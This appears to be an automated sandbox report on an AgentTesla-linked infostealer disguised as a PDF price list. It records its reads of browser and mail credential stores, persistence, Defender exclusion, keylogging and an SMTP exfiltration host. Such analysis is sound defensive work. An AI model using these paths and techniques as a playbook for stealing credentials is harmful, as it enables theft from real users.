                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7216, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match | File source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1894805275.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.4141088444.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7788, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7216, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 3260, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7216, type: MEMORYSTR
                    MITRE ATT&CK Matrix (one row per line; a number before a technique name is the report's hit-count badge for that cell)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | 31 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | 31 Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1519324 | Sample: 26.09 01.10.2024Fiyat Liste... | Startdate: 26/09/2024 | Architecture: WINDOWS | Score: 100

                    Graph nodes (node id, label, edge from parent node):
                    2  start node
                    41 mail.musabody.com (2->41)
                    53 Suricata IDS alerts for network traffic (2->53)
                    55 Found malware configuration (2->55)
                    57 Malicious sample detected (through community Yara rule) (2->57)
                    59 13 other signatures (2->59)
                    8  26.09 01.10.2024Fiyat Listesi.pdf.exe 4 (2->8, started)
                    12 ctsdvwT.exe 3 (2->12, started)
                    14 ctsdvwT.exe 2 (2->14, started)
                    37 26.09 01.10.2024Fi...Listesi.pdf.exe.log, ASCII (8->37, dropped)
                    61 Adds a directory exclusion to Windows Defender (8->61)
                    16 26.09 01.10.2024Fiyat Listesi.pdf.exe 1 5 (8->16, started)
                    21 powershell.exe 23 (8->21, started)
                    63 Multi AV Scanner detection for dropped file (12->63)
                    65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) (12->65)
                    67 Machine Learning detection for dropped file (12->67)
                    23 ctsdvwT.exe 2 (12->23, started)
                    25 ctsdvwT.exe (12->25, started)
                    27 ctsdvwT.exe (12->27, started)
                    29 ctsdvwT.exe (14->29, started)
                    39 mail.musabody.com 108.167.140.123, 587, 63219, 63220 UNIFIEDLAYER-AS-1US United States (16->39)
                    33 C:\Users\user\AppData\Roaming\...\ctsdvwT.exe, PE32 (16->33, dropped)
                    35 C:\Users\user\...\ctsdvwT.exe:Zone.Identifier, ASCII (16->35, dropped)
                    43 Tries to steal Mail credentials (via file / registry access) (16->43)
                    45 Hides that the sample has been downloaded from the Internet (zone.identifier) (16->45)
                    47 Installs a global keyboard hook (16->47)
                    49 Loading BitLocker PowerShell Module (21->49)
                    31 conhost.exe (21->31, started)
                    51 Tries to harvest and steal browser information (history, passwords, etc) (29->51)

                    Source | Detection | Scanner | Label | Link
                    26.09 01.10.2024Fiyat Listesi.pdf.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                    26.09 01.10.2024Fiyat Listesi.pdf.exe | 100% | Joe Sandbox ML
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://www.fontbureau.com | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    https://account.dyn.com/ | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
                    http://www.fonts.com | 0% | URL Reputation | safe
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://www.sakkal.com | 0% | URL Reputation | safe
                    http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe
                    http://mail.musabody.com | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    mail.musabody.com | 108.167.140.123 | true | true | | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://www.apache.org/licenses/LICENSE-2.0 | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://www.fontbureau.com | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designersG | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers/? | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.founder.com.cn/cn/bThe | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://account.dyn.com/ | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers? | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.tiro.com | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.goodfont.co.kr | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.carterandcone.coml | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.sajatypeworks.com | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.typography.netD | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers/cabarga.htmlN | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.founder.com.cn/cn/cThe | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.galapagosdesign.com/staff/dennis.htm | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.founder.com.cn/cn | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers/frere-user.html | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.jiyu-kobo.co.jp/ | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.galapagosdesign.com/DPlease | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fontbureau.com/designers8 | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.fonts.com | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.sandoll.co.kr | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.urwpp.deDPlease | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.zhongyicts.com.cn | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705109897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1830841149.0000000003167000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1913937997.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://www.sakkal.com | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1707971157.0000000005D80000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://mail.musabody.com | 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
IP:108.167.140.123
Domain:mail.musabody.com
Country:United States
ASN:46606
ASN Name:UNIFIEDLAYER-AS-1US
Malicious:true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1519324
                      Start date and time:2024-09-26 11:22:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 21s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:26.09 01.10.2024Fiyat Listesi.pdf.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@16/9@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 206
                      • Number of non-executed functions: 4
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: 26.09 01.10.2024Fiyat Listesi.pdf.exe
Time  Type  Description
05:22:59  API Interceptor  8686237x Sleep call for process: 26.09 01.10.2024Fiyat Listesi.pdf.exe modified
05:23:01  API Interceptor  9x Sleep call for process: powershell.exe modified
05:23:12  API Interceptor  7333622x Sleep call for process: ctsdvwT.exe modified
10:23:03  Autostart  Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
10:23:11  Autostart  Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Match:108.167.140.123
Associated Sample Name / URL  Detection  Threat Name  Context
Eschemyquote24573j33.exe  malicious  AgentTesla
PO-2024)bekotas.pdf.exe  malicious  AgentTesla
Price 10243975 Bekotas A.S scan.pdf.exe  malicious  AgentTesla
DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exe  malicious  AgentTesla
rRFQ_251477800TM.exe  malicious  AgentTesla, PureLog Stealer
Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exe  malicious  AgentTesla, PureLog Stealer
rPO50018137-14_pdf.exe  malicious  AgentTesla, PureLog Stealer, RedLine
62402781, Fiyat Teklif Talebi.pdf.exe  malicious  AgentTesla, PureLog Stealer, RedLine
2024-19-2118fernas.pdf.exe  malicious  AgentTesla
DHL Shipping DocumentTracking No Confirmation.doc.exe  malicious  AgentTesla, PureLog Stealer
Match:mail.musabody.com
Associated Sample Name / URL  Detection  Threat Name  Context
Eschemyquote24573j33.exe  malicious  AgentTesla  108.167.140.123
PO-2024)bekotas.pdf.exe  malicious  AgentTesla  108.167.140.123
Price 10243975 Bekotas A.S scan.pdf.exe  malicious  AgentTesla  108.167.140.123
DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exe  malicious  AgentTesla  108.167.140.123
rRFQ_251477800TM.exe  malicious  AgentTesla, PureLog Stealer  108.167.140.123
Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exe  malicious  AgentTesla, PureLog Stealer  108.167.140.123
rPO50018137-14_pdf.exe  malicious  AgentTesla, PureLog Stealer, RedLine  108.167.140.123
62402781, Fiyat Teklif Talebi.pdf.exe  malicious  AgentTesla, PureLog Stealer, RedLine  108.167.140.123
2024-19-2118fernas.pdf.exe  malicious  AgentTesla  108.167.140.123
DHL Shipping DocumentTracking No Confirmation.doc.exe  malicious  AgentTesla, PureLog Stealer  108.167.140.123
Match:UNIFIEDLAYER-AS-1US
Associated Sample Name / URL  Detection  Threat Name  Context
https://iskiosvillas.gr/booking/AAMAyYwBGAAAAAAB2B1ZmTNuNBwBbZXOiMVmgTZdxswVIV.html  malicious  Unknown  192.185.78.86
HPDeskJet_043_SCAN.pdf  malicious  Phisher  108.179.194.88
Eschemyquote24573j33.exe  malicious  AgentTesla  108.167.140.123
shipping documents.exe  malicious  AgentTesla  162.214.80.31
autorization Letter.exe  malicious  AgentTesla  192.185.129.60
http://www.richfieldkennel.com/SharePointProposalFile/  malicious  HTMLPhisher  192.185.102.120
https://putefix.dogfriendlytahoe.com/  malicious  Unknown  192.185.24.110
https://albertanewsprint.dogfriendlytahoe.com/  malicious  Unknown  192.185.24.110
INDIA - VSL PARTICULARS.pdf.exe  malicious  AgentTesla  50.87.144.157
https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/  malicious  Unknown  50.6.153.157
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
